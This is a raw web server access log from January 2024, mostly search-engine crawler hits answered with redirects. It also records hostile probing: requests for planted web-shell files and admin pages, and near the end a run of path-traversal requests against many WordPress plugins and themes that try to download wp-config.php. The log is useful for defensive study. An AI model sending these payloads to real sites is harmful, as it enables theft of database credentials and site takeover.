103.131.71.151 - - [20/Jan/2024:22:52:02 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.238 - - [20/Jan/2024:22:52:04 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.77.97 - - [21/Jan/2024:03:49:02 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [21/Jan/2024:04:16:11 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.136 - - [21/Jan/2024:04:49:30 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.98 - - [21/Jan/2024:05:49:07 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [21/Jan/2024:11:36:47 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.96 - - [21/Jan/2024:11:36:48 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.21 - - [21/Jan/2024:12:04:11 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.77.97 - - [21/Jan/2024:12:32:13 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.96 - - [21/Jan/2024:12:35:25 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [21/Jan/2024:13:33:48 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [21/Jan/2024:14:33:55 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.137 - - [21/Jan/2024:15:33:44 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.96 - - [21/Jan/2024:16:33:50 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.98 - - [21/Jan/2024:17:33:45 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.150 - - [21/Jan/2024:21:18:27 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.65.10 - - [21/Jan/2024:22:47:00 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.10 - - [21/Jan/2024:23:46:14 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.9 - - [21/Jan/2024:23:46:30 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
154.83.11.199 - - [22/Jan/2024:05:23:10 +0700] "GET /administrator/index.php HTTP/1.1" 302 240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
66.249.71.137 - - [22/Jan/2024:05:39:56 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
154.201.33.41 - - [22/Jan/2024:05:57:26 +0700] "GET /administrator/index.php HTTP/1.1" 302 240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
66.249.65.11 - - [22/Jan/2024:06:38:52 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.9 - - [22/Jan/2024:07:38:52 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.132 - - [22/Jan/2024:10:10:22 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.185 - - [22/Jan/2024:10:10:24 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
42.119.149.162 - - [22/Jan/2024:11:35:03 +0700] "GET / HTTP/1.1" 302 217 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1"
66.249.65.11 - - [22/Jan/2024:12:32:31 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.9 - - [22/Jan/2024:12:32:41 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
115.78.92.253 - - [22/Jan/2024:12:57:40 +0700] "GET / HTTP/1.1" 302 217 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
66.249.71.137 - - [22/Jan/2024:13:54:35 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [22/Jan/2024:14:53:16 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
141.147.155.248 - - [22/Jan/2024:16:17:21 +0700] "GET /worm0.PhP7 HTTP/1.1" 302 227 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.65.10 - - [22/Jan/2024:20:50:25 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.48 - - [22/Jan/2024:20:51:44 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.137 - - [22/Jan/2024:21:49:47 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.133 - - [22/Jan/2024:22:47:54 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.11 - - [22/Jan/2024:23:46:04 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.10 - - [22/Jan/2024:23:53:35 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.20 - - [23/Jan/2024:05:14:24 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.65.11 - - [23/Jan/2024:05:47:04 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.10 - - [23/Jan/2024:05:47:04 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.136 - - [23/Jan/2024:05:59:31 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.11 - - [23/Jan/2024:06:58:53 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.9 - - [23/Jan/2024:07:57:09 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.10 - - [23/Jan/2024:08:55:38 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [23/Jan/2024:10:41:21 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.136 - - [23/Jan/2024:11:07:32 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.11 - - [23/Jan/2024:11:07:36 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.180 - - [23/Jan/2024:11:19:39 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.65.10 - - [23/Jan/2024:12:02:54 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.6 - - [23/Jan/2024:14:58:46 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.9 - - [23/Jan/2024:15:58:29 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [23/Jan/2024:16:57:33 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
138.2.41.172 - - [23/Jan/2024:18:42:59 +0700] "GET /nice.php?p= HTTP/1.1" 302 228 "-" "python-requests/2.27.1"
168.138.41.19 - - [23/Jan/2024:20:03:38 +0700] "GET /worm0.PhP7 HTTP/1.1" 302 227 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
57.129.1.90 - - [23/Jan/2024:21:05:53 +0700] "GET /wp-login.php HTTP/1.1" 302 229 "-" "ddg_android/5.169.0 (com.duckduckgo.mobile.android; Android API 33)"
138.2.61.135 - - [23/Jan/2024:21:29:32 +0700] "GET /repeater.php HTTP/1.1" 302 229 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
138.2.61.135 - - [23/Jan/2024:21:29:32 +0700] "GET /admin.php HTTP/1.1" 302 226 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
138.2.61.135 - - [23/Jan/2024:21:29:32 +0700] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 302 253 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
138.2.61.135 - - [23/Jan/2024:21:29:32 +0700] "GET /wp-admin/ngetes.php HTTP/1.1" 302 236 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
66.249.71.137 - - [23/Jan/2024:22:54:41 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [23/Jan/2024:22:54:42 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.11 - - [23/Jan/2024:23:52:56 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.136 - - [24/Jan/2024:01:35:19 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.137 - - [24/Jan/2024:01:35:20 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.74.73 - - [24/Jan/2024:02:42:57 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.74.74 - - [24/Jan/2024:02:43:14 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.43.7.205 - - [24/Jan/2024:05:48:13 +0700] "GET /wp-apxupx.php?apx=upx HTTP/1.1" 302 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
78.142.18.92 - - [24/Jan/2024:07:49:09 +0700] "GET /style.php HTTP/1.1" 302 226 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.74.72 - - [24/Jan/2024:08:14:44 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.132 - - [24/Jan/2024:09:13:38 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.74.74 - - [24/Jan/2024:09:21:19 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.137 - - [24/Jan/2024:09:28:49 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.133 - - [24/Jan/2024:09:36:33 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.190 - - [24/Jan/2024:10:52:29 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.63 - - [24/Jan/2024:10:52:31 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.74.72 - - [24/Jan/2024:12:07:39 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.32 - - [24/Jan/2024:12:28:37 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.74.74 - - [24/Jan/2024:13:33:22 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.38 - - [24/Jan/2024:14:23:10 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
194.126.177.80 - - [24/Jan/2024:14:36:44 +0700] "GET /administrator/index.php HTTP/1.1" 302 240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.225 Safari/537.36"
194.126.177.80 - - [24/Jan/2024:14:36:44 +0700] "GET /administrator/index.php HTTP/1.1" 302 240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.225 Safari/537.36"
66.249.71.136 - - [24/Jan/2024:14:38:30 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [24/Jan/2024:15:39:15 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.212 - - [24/Jan/2024:16:38:56 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.217 - - [24/Jan/2024:16:38:58 +0700] "GET /images/logos/logoo2x.jpg HTTP/1.1" 302 241 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
78.142.18.92 - - [24/Jan/2024:17:01:41 +0700] "GET /style.php HTTP/1.1" 302 226 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.79.34 - - [24/Jan/2024:21:08:36 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.136 - - [24/Jan/2024:21:47:53 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.71.133 - - [24/Jan/2024:22:08:28 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.35 - - [24/Jan/2024:22:51:52 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.137 - - [25/Jan/2024:03:15:24 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.35 - - [25/Jan/2024:03:15:25 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.188.87.39 - - [25/Jan/2024:03:32:05 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763"
66.249.79.34 - - [25/Jan/2024:04:13:34 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.43.7.205 - - [25/Jan/2024:04:41:20 +0700] "GET //wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1" 302 293 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:21 +0700] "GET //wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 302 293 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:22 +0700] "GET //wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php HTTP/1.1" 302 330 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:23 +0700] "GET //wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php HTTP/1.1" 302 292 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:23 +0700] "GET //wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php HTTP/1.1" 302 349 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:24 +0700] "GET //wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes HTTP/1.1" 302 351 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:26 +0700] "GET //wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php HTTP/1.1" 302 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:27 +0700] "GET //wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 302 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:28 +0700] "GET //force-download.php?file=wp-config.php HTTP/1.1" 302 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:28 +0700] "GET //wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1" 302 324 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:29 +0700] "GET //wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php HTTP/1.1" 302 319 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:30 +0700] "GET //wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1" 302 307 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:30 +0700] "GET //wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php HTTP/1.1" 302 306 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:31 +0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php HTTP/1.1" 302 311 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:32 +0700] "GET //wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php HTTP/1.1" 302 301 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:34 +0700] "GET //wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php HTTP/1.1" 302 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:35 +0700] "GET //wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1" 302 307 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:36 +0700] "GET //wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php HTTP/1.1" 302 295 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:36 +0700] "GET //wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 302 296 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:37 +0700] "GET //wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1" 302 300 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:38 +0700] "GET //wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 302 290 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:39 +0700] "GET //wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php HTTP/1.1" 302 348 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
